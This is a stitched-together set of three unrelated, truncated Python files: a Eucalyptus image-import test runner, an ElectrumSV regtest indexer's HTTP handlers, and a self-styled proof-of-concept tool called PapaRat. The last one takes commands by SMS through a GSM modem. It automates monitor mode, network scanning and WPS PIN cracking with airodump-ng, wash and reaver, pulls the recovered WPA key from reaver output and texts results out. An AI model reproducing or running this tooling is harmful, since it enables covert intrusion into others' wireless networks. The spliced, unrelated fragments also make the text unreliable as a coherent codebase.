# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: <EMAIL>
#!/usr/bin/env python
from nephoria.testcase_utils.cli_test_runner import CliTestRunner, SkipTestException
from nephoria.testcases.euca2ools.euca2ools_image_utils import Euca2oolsImageUtils
from nephoria.usercontext import UserContext
from nephoria.testcontroller import TestController
from cloud_utils.log_utils import get_traceback, red
from cloud_utils.system_utils import local
from cloud_utils.net_utils.sshconnection import CommandExitCodeException
from boto.s3.bucket import Bucket
from boto.ec2.keypair import KeyPair
from boto.vpc.subnet import Subnet
from boto.exception import S3ResponseError
import copy
from nephoria.aws.ec2.conversiontask import ConversionTask
from subprocess import CalledProcessError
from urllib2 import Request, urlopen, URLError
from base64 import b64decode
import os
import re
import time
import types
class ImportInstanceTests(CliTestRunner):
_DEFAULT_CLI_ARGS = copy.copy(CliTestRunner._DEFAULT_CLI_ARGS)
_DEFAULT_CLI_ARGS['image_url'] = {
'args': ['--image-url'],
'kwargs': {'default': None,
'help': 'URL containing remote image to create import instance task from'}}
_DEFAULT_CLI_ARGS['instanceuser'] = {
'args': ['--instance-user'],
'kwargs': {'dest': 'instance_user',
'default': None,
'help': 'Username used for ssh or winrm login ie: Linux:root '
'Windows:Administrator'}}
_DEFAULT_CLI_ARGS['workerip'] = {
'args': ['--workerip'],
'kwargs': {'dest': 'worker_machine',
'default': None,
'help': 'The ip/hostname of the machine that the operation will be performed '
'on'}}
_DEFAULT_CLI_ARGS['worker_username'] = {
'args': ['--worker-username'],
'kwargs': {'dest': 'worker_username',
'default': 'root',
'help': 'The username of the machine that the operation will be performed on'}}
_DEFAULT_CLI_ARGS['worker_password'] = {
'args': ['--worker-password'],
'kwargs': {'dest': 'worker_password',
'default': None,
'help': 'The password of the machine that the operation will be performed on'}}
_DEFAULT_CLI_ARGS['worker_keypath'] = {
'args': ['--worker-keypath'],
'kwargs': {'dest': 'worker_keypath',
'default': None,
'help': 'The ssh keypath of the machine that the operation will be performed '
'on'}}
_DEFAULT_CLI_ARGS['destpath'] = {
'args': ['--destpath'],
'kwargs': {'default': '/disk1/storage',
'help': 'The path on the workip that this operation will be performed on'}}
_DEFAULT_CLI_ARGS['imagelocation'] = {
'args': ['--imagelocation'],
'kwargs': {'default': None,
'help': 'The file path on the worker of a pre-existing image to import'}}
_DEFAULT_CLI_ARGS['urlpass'] = {
'args': ['--urlpass'],
'kwargs': {'dest': 'wget_password',
'default': None,
'help': 'Password needed to retrieve remote url'}}
_DEFAULT_CLI_ARGS['urluser'] = {
'args': ['--urluser'],
'kwargs': {'dest': 'wget_user',
'default': None,
'help': 'Username needed to retrieve remote url'}}
_DEFAULT_CLI_ARGS['gigtime'] = {
'args': ['--gigtime'],
'kwargs': {'dest': 'time_per_gig',
'default': 300,
'help': 'Time allowed per gig size of image to be used'}}
_DEFAULT_CLI_ARGS['virtualization_type'] = {
'args': ['--virtualization-type'],
'kwargs': {'default': 'hvm',
'help': 'virtualization type hvm or pv'}}
_DEFAULT_CLI_ARGS['bucket'] = {
'args': ['--bucket'],
'kwargs': {'dest': 'bucketname',
'default': None,
'help': 'bucket name to be used for import task'}}
_DEFAULT_CLI_ARGS['arch'] = {
'args': ['--arch'],
'kwargs': {'dest': 'arch',
'default': "x86_64",
'help': 'Image architecture ie:x86_64'}}
_DEFAULT_CLI_ARGS['imageformat'] = {
'args': ['--imageformat'],
'kwargs': {'dest': 'imageformat',
'default': 'raw',
'help': 'image format for import task. ie vmdk raw vhd'}}
_DEFAULT_CLI_ARGS['platform'] = {
'args': ['--platform'],
'kwargs': {'dest': 'platform',
'default': "Linux",
'help': 'Linux or Windows'}}
_DEFAULT_CLI_ARGS['uploaded_manifest'] = {
'args': ['--uploaded-manifest'],
'kwargs': {'dest': 'upload_manifest',
'default': None,
'help': 'bucket/prefix location of manifest to register'}}
_DEFAULT_CLI_ARGS['bundle_manifest'] = {
'args': ['--bundle-manifest'],
'kwargs': {'dest': 'bundle_manifest',
'default': None,
'help': 'file path on worker to bundle manifest to upload'}}
_DEFAULT_CLI_ARGS['overwrite'] = {
'args': ['--overwrite'],
'kwargs': {'action': 'store_true',
'default': False,
'help': 'Will overwrite files in matching work dir on worker machine if found'}}
_DEFAULT_CLI_ARGS['time_per_gig'] = {
'args': ['--time-per-gig'],
'kwargs': {'default': 100,
'help': 'Time allowed (in addition to base timeout) per image size in GB '
'before timing out task. Default:100 seconds'}}
_DEFAULT_CLI_ARGS['base_timeout'] = {
'args': ['--base-timeout'],
'kwargs': {'default': 600,
'help': 'Base timeout value prior to adding time per gig of image size'}}
_DEFAULT_CLI_ARGS['task_user_data'] = {
'args': ['--task-user-data'],
'kwargs': {'default': '#cloud-config\ndisable_root: false',
'help': 'user data to provide to import instance task request'}}
_DEFAULT_CLI_ARGS['no_clean_on_exit'] = {
'args': ['--no-clean-on-exit'],
'kwargs': {'action': 'store_true',
'default': False,
'help': 'Disable cleanup method upon exit to leave test resources behind'}}
_DEFAULT_CLI_ARGS['no_https'] = {
'args': ['--no-https'],
'kwargs': {'action': 'store_true',
'default': False,
'help': 'Use http instead of https'}}
_DEFAULT_CLI_ARGS['subnet'] = {
'args': ['--subnet'],
'kwargs': {'dest': 'subnet',
'default': None,
'help': 'Subnet to use to create the instance network'}}
del _DEFAULT_CLI_ARGS['emi']
def post_init(self):
"""
cli_test_runner method which runs after __init__()
"""
self.args.worker_password = self.args.worker_password or self.args.password
self.args.worker_keypath = self.args.worker_keypath
# Format platform case sensitive arg.
if str(self.args.platform).upper().strip() == "WINDOWS":
self.args.platform = "Windows"
elif str(self.args.platform).upper().strip() == "LINUX":
self.args.platform = "Linux"
if self.args.instance_user is None:
if self.args.platform == "Windows":
self.args.instance_user = 'Administrator'
else:
self.args.instance_user = 'root'
self.latest_task_dict = None
self._user = None
self._tc = None
self._image_utils = None
self._bucket = None
self._group = None
self._imagelocation = None
self._keypair = None
self._subnet = None
self._created_keypairs = []
self._zone = None
self.args_check = None
self.current_task = None
@property
def imagelocation(self):
if not self._imagelocation:
self._imagelocation = self.get_source_volume_image()
return self._imagelocation
@property
def tc(self):
if not self._tc:
if not self.args.clc and not self.args.environment_file:
self.log.error('Must provide --clc or --environment_file arg to run this test')
raise ValueError('Must provide --clc or --environment_file arg to run this test')
try:
self._tc = TestController(hostname=self.args.clc,
environment_file=self.args.environment_file,
password=self.args.password,
clouduser_name=self.args.test_user,
clouduser_account=self.args.test_account,
log_level=self.args.log_level,
https=(not self.args.no_https))
except Exception as E:
self.log.error("{0}\nError creating TestController obj:{1}"
.format(get_traceback(), E))
raise E
return self._tc
@property
def created_image(self):
task = (self.latest_task_dict or {}).get('task', None)
return getattr(task, 'id', None)
@property
def worker_password(self):
wp = self.args.worker_password or self.args.password
return wp
@property
def worker_keypath(self):
wk = self.args.worker_keypath or self.args.keypair
return wk
@property
def image_utils(self):
iu = getattr(self, '_image_utils', None)
if iu is None:
# Create an ImageUtils helper from the arguments provided in this testcase...
setattr(self.args, 'worker_machine', self.tc.sysadmin.clc_machine)
setattr(self.args, 'user_context', self.user)
setattr(self.args, 'test_controller', self.tc)
setattr(self.args, 'user_context', self.user)
iu = self.do_with_args(Euca2oolsImageUtils)
setattr(self, '_image_utils', iu)
return iu
@property
def user(self):
if not self._user:
if self.args.access_key and self.args.secret_key and self.args.region:
self._user = UserContext(aws_access_key=self.args.access_key,
aws_secret_key=self.args.secret_key,
region=self.args.region)
if (self.args.clc or self.args.environment_file) and self.tc:
self._user = self.tc.user
return self._user
@property
def subnet(self):
if self._subnet is None:
if self.args.subnet:
try:
self._subnet = self.user.ec2.get_subnet(self.args.subnet)
except Exception as E:
self.log.error(red('{0}\nFailed to fetch CLI provided subnet:"{1}", ERR:"{2}"'
.format(get_traceback(), self.args.subnet, E)))
return self._subnet
@subnet.setter
def subnet(self, subnet):
if subnet is None or isinstance(subnet, Subnet):
self._subnet = subnet
else:
self.log.error(red('Unsupported type for subnet:{0}/{1}, must be None or type Subnet'
.format(subnet, type(subnet))))
def check_url(self, url=None):
retries = 12
retry_delay = 10
req = Request(self.args.image_url)
url = url or self.args.image_url
for x in range(retries + 1):
try:
response = urlopen(req)
self.log.debug('URL: "{0}" is valid and reachable!'.format(url))
except URLError, e:
if x < retries:
if hasattr(e, 'reason'):
self.log.debug('Retrying to resolve "{0}", and got: "{1}"'
.format(url, e.reason))
elif hasattr(e, 'code'):
self.log.debug('Retrying to resolve "{0}", and got: "{1}"'
.format(url, e.code))
time.sleep(retry_delay)
continue
else:
if hasattr(e, 'reason'):
raise AssertionError('INVALID URL: "{0}", "{1}"'
.format(url, e.reason))
elif hasattr(e, 'code'):
raise AssertionError('INVALID REQUEST: "{0}", "{1}"'
.format(url, e.code))
break
@property
def bucket(self):
if not self._bucket:
bucketname = self.args.bucketname
if not bucketname:
if self.imagelocation or self.args.image_url:
location = self.imagelocation or self.args.image_url
image_name = os.path.basename(location)[0:15]
else:
image_name = str(self.args.platform or 'test')
bucketname = 'eutester_import_' + str(image_name).lower()
self._bucket = self.user.s3.create_bucket(bucketname)
return self._bucket
@bucket.setter
def bucket(self, value=None):
if value is None or isinstance(value, Bucket):
self._bucket = value
elif isinstance(value, basestring):
user = self.user
assert isinstance(user, UserContext)
try:
self._bucket = self.user.s3.get_bucket(value)
except S3ResponseError as SE:
self.log.error('Error fetching bucket:"{0}", err:"{1}"'.format(value, SE))
raise SE
else:
raise ValueError('Unknown type for bucket: "{0}/{1}"'.format(value, type(value)))
@classmethod
def assertEquals(cls, x, y):
assert x == y, str(x) + ' is not equal to ' + str(y)
@property
def keyname(self):
| |
from __future__ import annotations
from datetime import datetime, timedelta
import json
from typing import Any, cast, Dict, Optional, TYPE_CHECKING
import requests
from aiohttp import web
import logging
from bitcoinx import hex_str_to_hash, hash_to_hex_str
from electrumsv_node import electrumsv_node
from .constants import SERVER_HOST, SERVER_PORT
from . import sqlite_db
from .types import FILTER_RESPONSE_SIZE, filter_response_struct, IndexerPushdataRegistrationFlag, \
outpoint_struct, OutpointJSONType, output_spend_struct, OutpointType, \
RestorationFilterRequest, tip_filter_entry_struct, TipFilterRegistrationEntry, \
TipFilterRegistrationResponse, tsc_merkle_proof_json_to_binary, ZEROED_OUTPOINT
if TYPE_CHECKING:
from .server import ApplicationState
logger = logging.getLogger('handlers')
async def ping(request: web.Request) -> web.Response:
return web.Response(text="true")
async def error(request: web.Request) -> web.Response:
raise ValueError("This is a test of raising an exception in the handler")
async def get_endpoints_data(request: web.Request) -> web.Response:
utc_now_datetime = datetime.utcnow()
utc_expiry_datetime = utc_now_datetime + timedelta(days=1)
data: Dict[str, Any] = {
"apiType": "bsvapi.endpoints",
"apiVersion": 1,
"baseUrl": f"http://{SERVER_HOST}:{SERVER_PORT}",
"timestamp": utc_now_datetime.isoformat() +"Z",
"expiryTime": utc_expiry_datetime.isoformat() +"Z",
"endpoints": [
{
"apiType": "bsvapi.transaction",
"apiVersion": 1,
"baseURL": "/api/v1/transaction",
},
{
"apiType": "bsvapi.merkle-proof",
"apiVersion": 1,
"baseURL": "/api/v1/merkle-proof",
},
{
"apiType": "bsvapi.output-spend",
"apiVersion": 1,
"baseURL": "/api/v1/output-spend",
},
{
"apiType": "bsvapi.restoration",
"apiVersion": 1,
"baseURL": "/api/v1/restoration",
"pricing": {
"data": {
"satoshis": 4524,
"bytes": 10000000,
}
}
}
]
}
return web.json_response(data=data)
async def get_restoration_matches(request: web.Request) -> web.StreamResponse:
"""This the main endpoint for the rapid restoration API"""
app_state: ApplicationState = request.app['app_state']
accept_type = request.headers.get("Accept", "*/*")
if accept_type == "*/*":
accept_type = "application/json"
body = await request.content.read()
if body:
pushdata_hashes_hex: RestorationFilterRequest = \
json.loads(body.decode('utf-8'))['filterKeys']
else:
return web.Response(status=400)
pushdata_hashes = [ bytes.fromhex(value) for value in pushdata_hashes_hex ]
if accept_type == 'application/octet-stream':
headers = {'Content-Type': 'application/octet-stream', 'User-Agent': 'SimpleIndexer'}
response = web.StreamResponse(status=200, reason='OK', headers=headers)
await response.prepare(request)
result = sqlite_db.get_restoration_matches(app_state.database_context, pushdata_hashes,
json=False)
count = 0
for match in result:
packed_match = filter_response_struct.pack(*match)
await response.write(packed_match)
count += 1
total_size = count * FILTER_RESPONSE_SIZE
logger.debug(f"Total pushdata filter match response size: {total_size} for count: {count}")
else:
headers = {'Content-Type': 'application/json', 'User-Agent': 'SimpleIndexer'}
response = web.StreamResponse(status=200, reason='OK', headers=headers)
await response.prepare(request)
result = sqlite_db.get_restoration_matches(app_state.database_context, pushdata_hashes,
json=True)
for match in result:
data = (json.dumps(match) + "\n").encode('utf-8')
await response.write(data)
await response.write(b"{}")
return response
async def get_transaction(request: web.Request) -> web.Response:
app_state: ApplicationState = request.app['app_state']
accept_type = request.headers.get("Accept", "*/*")
if accept_type == "*/*":
accept_type = "application/json"
tx_id = request.match_info['txid']
if not tx_id:
return web.Response(status=400, reason="no txid provided")
try:
tx_hash = hex_str_to_hash(tx_id)
except ValueError:
return web.Response(status=400, reason="invalid txid")
rawtx = sqlite_db.get_transaction(app_state.database_context, tx_hash)
if rawtx is None:
return web.Response(status=404)
if accept_type == 'application/octet-stream':
return web.Response(body=rawtx)
else:
return web.json_response(data=rawtx.hex())
async def get_merkle_proof(request: web.Request) -> web.Response:
"""
It is expected that a valid reponse will have a content length, and should stream the data
if possible. This is to allow things like 4 GiB transactions to be provided within proof
with no server overhead over providing both proof and transaction separately.
This regtest implementation has to use the node to provide data via the JSON-RPC API and this
will never be streamable or scalable. But professional services would be expected to design
for streaming out of the box, and would not be encumbered by limitations imposed by the node.
"""
# Todo - use the bitcoin node as much as possible (this is only for RegTest)
app_state: ApplicationState = request.app['app_state']
accept_type = request.headers.get("Accept", "*/*")
if accept_type == "*/*":
accept_type = "application/json"
txid = request.match_info['txid']
if not txid:
return web.Response(status=400, reason="no txid submitted")
try:
tx_hash = hex_str_to_hash(txid)
except ValueError:
return web.Response(status=400, reason="invalid txid")
block_hash = sqlite_db.get_block_hash_for_tx(app_state.database_context, tx_hash)
if not block_hash:
return web.Response(status=404)
include_full_tx = request.query.get("includeFullTx") == "1"
target_type = request.query.get("targetType", "hash")
if target_type is not None and target_type not in {'hash', 'header', 'merkleroot'}:
return web.Response(status=400)
# Request TSC merkle proof from the node
# Todo - binary format not currently supported by the node
try:
tsc_merkle_proof = electrumsv_node.call_any("getmerkleproof2",
hash_to_hex_str(block_hash), txid, include_full_tx, target_type).json()['result']
if accept_type == 'application/octet-stream':
binary_response = tsc_merkle_proof_json_to_binary(tsc_merkle_proof,
include_full_tx=include_full_tx, target_type=target_type)
return web.Response(body=binary_response)
else:
return web.json_response(data=tsc_merkle_proof)
except requests.exceptions.HTTPError as e:
# the node does not return merkle proofs when there is only a single coinbase tx
# in the block. It could be argued that this is a bug and it should return the same format.
result = electrumsv_node.call_any("getrawtransaction", txid, 1).json()['result']
rawtx = result['hex']
blockhash = result['blockhash']
result = electrumsv_node.call_any("getblock", blockhash).json()['result']
num_tx = result['num_tx']
if num_tx != 1:
return web.Response(status=404)
else:
merkleroot = result['merkleroot']
assert merkleroot == txid
txOrId = txid
if include_full_tx:
txOrId = rawtx
if target_type == 'hash':
target = blockhash
elif target_type == 'header':
target = electrumsv_node.call_any("getblockheader", blockhash,
False).json()['result']
elif target_type == 'merkleroot':
target = merkleroot
else:
target = blockhash
tsc_merkle_proof = {
'index': 0,
'txOrId': txOrId,
'target': target,
'nodes': []
}
if accept_type == 'application/octet-stream':
binary_response = tsc_merkle_proof_json_to_binary(tsc_merkle_proof,
include_full_tx=include_full_tx, target_type=target_type)
return web.Response(body=binary_response)
else:
return web.json_response(data=tsc_merkle_proof)
async def post_output_spends(request: web.Request) -> web.Response:
"""
Return the metadata for each provided outpoint if they are spent.
"""
accept_type = request.headers.get("Accept", "*/*")
if accept_type == "*/*":
accept_type = "application/json"
content_type = request.headers.get('Content-Type')
body = await request.content.read()
if not body:
raise web.HTTPBadRequest(reason="no body")
client_outpoints: list[OutpointType] = []
if content_type == 'application/json':
# Convert the incoming JSON representation to the internal binary representation.
client_outpoints_json: list[OutpointJSONType] = json.loads(body.decode('utf-8'))
if not isinstance(client_outpoints_json, list):
raise web.HTTPBadRequest(reason="payload is not a list")
for entry in client_outpoints_json:
if not isinstance(entry, list) or len(entry) != 2 or not isinstance(entry[1], int):
raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
try:
tx_hash = hex_str_to_hash(entry[0])
except (ValueError, TypeError):
raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
client_outpoints.append((tx_hash, entry[1]))
elif content_type == 'application/octet-stream':
raise web.HTTPBadRequest(reason="binary request body support not implemented yet")
else:
raise web.HTTPBadRequest(reason="unknown request body content type")
app_state: ApplicationState = request.app['app_state']
existing_rows = sqlite_db.get_spent_outpoints(app_state.database_context, client_outpoints)
if accept_type == 'application/octet-stream':
result_bytes = b""
for row in existing_rows:
result_bytes += output_spend_struct.pack(row.out_tx_hash, row.out_idx,
row.in_tx_hash, row.in_idx, row.block_hash if row.block_hash else bytes(32))
return web.Response(body=result_bytes)
else:
json_list: list[tuple[str, int, str, int, Optional[str]]] = []
for row in existing_rows:
json_list.append((hash_to_hex_str(row.out_tx_hash), row.out_idx,
hash_to_hex_str(row.in_tx_hash), row.in_idx,
row.block_hash.hex() if row.block_hash else None))
return web.json_response(data=json_list)
async def post_output_spend_notifications_register(request: web.Request) -> web.Response:
"""
Register the caller provided UTXO references so that we send notifications if they get
spent. We also return the current state for any that are known as a response.
This is a bit clumsy, but this is the simple indexer and it is intended to be the minimum
effort to allow ElectrumSV to be used against regtest. It is expected that the caller
has connected to the notification web socket before making this call, and can keep up
with the notifications.
"""
accept_type = request.headers.get("Accept", "*/*")
if accept_type == "*/*":
accept_type = "application/json"
content_type = request.headers.get("Content-Type")
body = await request.content.read()
if not body:
raise web.HTTPBadRequest(reason="no body")
client_outpoints: list[OutpointType] = []
if content_type == 'application/json':
# Convert the incoming JSON representation to the internal binary representation.
client_outpoints_json: list[OutpointJSONType] = json.loads(body.decode('utf-8'))
if not isinstance(client_outpoints_json, list):
raise web.HTTPBadRequest(reason="payload is not a list")
for entry in client_outpoints_json:
if not isinstance(entry, list) or len(entry) != 2 or not isinstance(entry[1], int):
raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
try:
tx_hash = hex_str_to_hash(entry[0])
except (ValueError, TypeError):
raise web.HTTPBadRequest(reason="one or more payload entries are incorrect")
client_outpoints.append((tx_hash, entry[1]))
elif content_type == 'application/octet-stream':
if len(body) % outpoint_struct.size != 0:
raise web.HTTPBadRequest(reason="binary request body malformed")
for outpoint_index in range(len(body) // outpoint_struct.size):
outpoint = cast(OutpointType,
outpoint_struct.unpack_from(body, outpoint_index * outpoint_struct.size))
client_outpoints.append(outpoint)
else:
raise web.HTTPBadRequest(reason="unknown request body content type")
app_state: ApplicationState = request.app['app_state']
synchronizer = app_state.blockchain_state_monitor_thread
if synchronizer is None:
raise web.HTTPServiceUnavailable(reason="error finding synchronizer")
existing_rows = synchronizer.register_output_spend_notifications(client_outpoints)
if accept_type == 'application/octet-stream':
result_bytes = b""
for row in existing_rows:
result_bytes += output_spend_struct.pack(row.out_tx_hash, row.out_idx,
row.in_tx_hash, row.in_idx, row.block_hash if row.block_hash else bytes(32))
return web.Response(body=result_bytes)
else:
json_list: list[tuple[str, int, str, int, Optional[str]]] = []
for row in existing_rows:
json_list.append((hash_to_hex_str(row.out_tx_hash), row.out_idx,
hash_to_hex_str(row.in_tx_hash), row.in_idx,
row.block_hash.hex() if row.block_hash else None))
return web.json_response(data=json.dumps(json_list))
async def post_output_spend_notifications_unregister(request: web.Request) -> web.Response:
"""
This provides a way for the monitored output spends to be unregistered or cleared. It is
assumed that whomever has access to this endpoint, has control over the registration and
can do this on behalf of all users.
The reference server manages who is subscribed to what, and what should be monitored, and
uses this method to ensure the simple indexer is only monitoring what it needs to.
If the reference server wishes to clear all monitored output | |
<reponame>CosminStefanica/RatPack_PapaRat<gh_stars>0
"""
Copyright (C) 2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import serial
import time
import subprocess
import signal
import os
import binascii
import datetime
def print_license():
print( "PapaRat.py Copyright (C) 2018 RatPack.inc\n"+
"This program comes with ABSOLUTELY NO WARRANTY.\n"+
"This is free software, and you are welcome to redistribute it\n"+
"under certain conditions. This program's intended use is strictly\n"+
"as a proof of concept and shall not be under any circumstances used\n"+
"to cause any damage or harm to any third parties.\n"+
"FOR TESTING PURPOSES ONLY!")
def test_serial_interface():
return False
def log():
return False
def bash_roulette():
return False
def authenticate(sent_message=''):
print 'authenticate started'
return True
def chunks(text, length):
#Produce `length`-character chunks from `text`.
for start in range(0, len(text), length):
yield text[start:start+length]
def deauth(interface='wlan1mon', channel='1'):
print 'deauth started'
return -1
def send_text(text, path='/dev/ttyUSB1'):
number='insert your number here'
print len(text)
for chunk in chunks(text,130):
ser = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
# set text mode
ser.write('AT+CMGF=%d\r' % 1)
time.sleep(1)
ser.readlines()
# set encoding
ser.write('AT+CSCS="GSM"\r')
time.sleep(1)
ser.readlines()
# set number
ser.write('AT+CMGS="%s"\r' % number)
time.sleep(1)
ser.readlines()
# send message
ser.write(chunk.encode("utf-8", "ignore"))
ser.write('\x1a')
escapeVariable = False
line=ser.readlines()
while escapeVariable is not True:
print line
for item in line:
if "+CMGS: " in item:
escapeVariable = True
line=ser.readlines()
ser.close()
time.sleep(1)
def receive_text(path='/dev/ttyUSB1'):
# Start serial comms
modem = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
# Set text mode
modem.write('AT+CMGF=1\r')
# Request unread SMSes
modem.write('AT+CMGL="REC UNREAD"\r')
# Read output
response = modem.readlines()
# Close connection
modem.close()
print str(response).strip()
if str(response[-3]).strip() != 'OK':
return str(response[-3]).strip()
else:
return 'CONTINUE'
def purge_texts(path='/dev/ttyUSB1'):
# Start serial comms
modem = serial.Serial(path, baudrate=115200, dsrdtr=True, rtscts=True, timeout=1)
# Set text mode
modem.write('AT+CMGF=1\r')
# Delete all SMSes
modem.write('AT+CMGD=0,3\r')
# Ensure that unsent SMSes are purged, just to be sure.
modem.write('\x1a')
# Read output
response = modem.readlines()
# Close connection
modem.close()
print response
def parse_command(command=''):
parsedCommand = str(command).split(' ')
returnedCommand = { 'interface':'',
'bssid':'',
'timeout':'',
'channel':'',
'output_format':'',
'source_file':'',
'output_file':'',
'continue_reaver':False,
'wps_scan':False,
'verbose':False,
'monitor':False,
'open_networks':False}
for item in parsedCommand:
if item == '-i':
index = parsedCommand.index(item)
returnedCommand['interface'] = parsedCommand[index+1]
elif item == '-b':
index = parsedCommand.index(item)
returnedCommand['bssid'] = parsedCommand[index+1]
elif item == '-t':
index = parsedCommand.index(item)
returnedCommand['timeout'] = int(parsedCommand[index+1])
elif item == '-c':
index = parsedCommand.index(item)
returnedCommand['channel'] = parsedCommand[index+1]
elif item == '-f':
index = parsedCommand.index(item)
returnedCommand['output_format'] = parsedCommand[index+1]
elif item == '-s':
index = parsedCommand.index(item)
returnedCommand['source_file'] = parsedCommand[index+1]
elif item == '-o':
index = parsedCommand.index(item)
returnedCommand['output_file'] = parsedCommand[index+1]
elif item == '-wps':
returnedCommand['wps_scan'] = True
elif item == '-vv':
returnedCommand['verbose'] = True
elif item == '-stop':
returnedCommand['monitor'] = False
elif item == '-start':
returnedCommand['monitor'] = True
elif item == '-cr':
returnedCommand['continue_reaver'] = True
elif item == '-open':
returnedCommand['open_networks'] = True
#print returnedCommand
return returnedCommand
def process_dump(extension='.csv', source_file='AUTOwalker_Airodump'):
filename = source_file + '-01' + extension
dumpFile = open(filename,'r')
splitLines = []
lineDictionary = {'BSSID':'',
'First time seen':'',
'Last time seen':'',
'Channel':'',
'Speed':'',
'Privacy':'',
'Cypher':'',
'Auth':'',
'Power':'',
'#beacons':'',
'#IVS':'',
'lanIP':'',
'ID-Length':'',
'ESSID':'',
'key':''}
# Read top two lines to move the cursor down
dumpFile.readline()
dumpFile.readline()
for line in dumpFile:
if str(line) in ['\n', '\r\n']:
break
singleLine = str(line).split(',')
lineDictionary['BSSID'] = singleLine[0].strip()
lineDictionary['First time seen'] = singleLine[1].strip()
lineDictionary['Last time seen'] = singleLine[2].strip()
lineDictionary['Channel'] = singleLine[3].strip()
lineDictionary['Speed'] = singleLine[4].strip()
lineDictionary['Privacy'] = singleLine[5].strip()
lineDictionary['Cypher'] = singleLine[6].strip()
lineDictionary['Auth'] = singleLine[7].strip()
lineDictionary['Power'] = singleLine[8].strip()
lineDictionary['#beacons'] = singleLine[9].strip()
lineDictionary['#IVS'] = singleLine[10].strip()
lineDictionary['lanIP'] = singleLine[11].strip()
lineDictionary['ID-Length'] = singleLine[12].strip()
lineDictionary['ESSID'] = singleLine[13].strip()
lineDictionary['key'] = singleLine[14].strip()
if lineDictionary['Power'] != '-1':
splitLines.append(lineDictionary.copy())
splitLines = sorted(splitLines, key=lambda k: k['Power'], reverse=False)
dumpFile.close()
return splitLines[:15]
def process_wash(airodumpFileOutput):
source_file='AUTOwalker_wash'
filename = source_file
dumpFile = open(filename,'r')
splitLines = []
lineDictionary = {'BSSID':'',
'Channel':'',
'RSSI':'',
'WPS Version':'',
'Locked':'',
'ESSID':''}
dumpFile.readline()
dumpFile.readline()
for line in dumpFile:
if str(line) in ['\n', '\r\n']:
break
singleLine = str(line).split(' ')
lineDictionary['BSSID'] = singleLine[0].strip()
lineDictionary['Channel'] = singleLine[1].strip()
lineDictionary['RSSI'] = singleLine[3].strip()
lineDictionary['WPS Version'] = singleLine[4].strip()
lineDictionary['Locked'] = singleLine[6].strip()
lineDictionary['ESSID'] = singleLine[8].strip()
if lineDictionary['Locked'] != 'Yes':
splitLines.append(lineDictionary.copy())
builtMessage = ''
for dump_ID in airodumpFileOutput:
for wash_ID in splitLines:
if dump_ID['BSSID'] == wash_ID['BSSID']:
builtMessage += dump_ID['ESSID']
builtMessage += ' '
builtMessage += dump_ID['BSSID']
builtMessage += ' '
builtMessage += dump_ID['Power']
builtMessage += '|'
dumpFile.close()
return builtMessage
def process_reaver():
source_file='AUTOwalker_reaver'
dumpFile = open(source_file, 'r')
for line in dumpFile:
if 'WARNING: Detected AP rate limiting' in line:
#'Limited rate, abort crack'
dumpFile.close()
return -1
if 'seconds/pin' in line:
print line
processedLine = str(line).split(' ')[6]
print processedLine
processedLine = processedLine[1:]
dumpFile.close()
print processedLine
return int(processedLine)
if 'WPA PSK' in line:
processedLine = str(line).split(':')
#send_text(line)
#Send it as a text message
dumpFile.close()
return -2
def process_crack(source_file=''):
filename = source_file + ''
dumpFile = open(filename, 'r')
password = dumpFile.readline() #return this for message
dumpFile.close()
return password
def iwconfig(interface='wlan1'):
print 'iwconfig started'
process = subprocess.Popen(["sudo","iwconfig"],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
(output, error) = process.communicate()
if interface in str(output):
return True
else:
return False
def airmon_ng(interface='wlan1', timeout=30, monitor=True):
print 'airmon started'
if monitor is True:
process = subprocess.Popen(["sudo", "airmon-ng", "start", interface],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
elif monitor is False:
process = subprocess.Popen(["sudo", "airmon-ng", "stop", interface],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
(output, error) = process.communicate()
#print(output)
return -1
def airodump_ng(interface='wlan1mon', channel='', output_file='AUTOwalker_Airodump', output_format = 'csv', timeout=1, open_flag = False):
print('airodump started on '+interface)
os.system('sudo mv AUTOwalker_Airodump-01.'+output_format+' Dumps/Airodump_'+str(datetime.datetime.now()).replace(" ","")+'.'+output_format)
time.sleep(5)
parameterList = ['sudo', 'airodump-ng', interface]
if channel != '':
parameterList.append('-c')
parameterList.append(channel)
if open_flag:
parameterList.append('--encrypt')
parameterList.append('OPN')
parameterList.append('--write')
parameterList.append(output_file)
parameterList.append('--output-format')
parameterList.append(output_format)
parameterList.append('--wps')
parameterList.append('--ignore-negative-one')
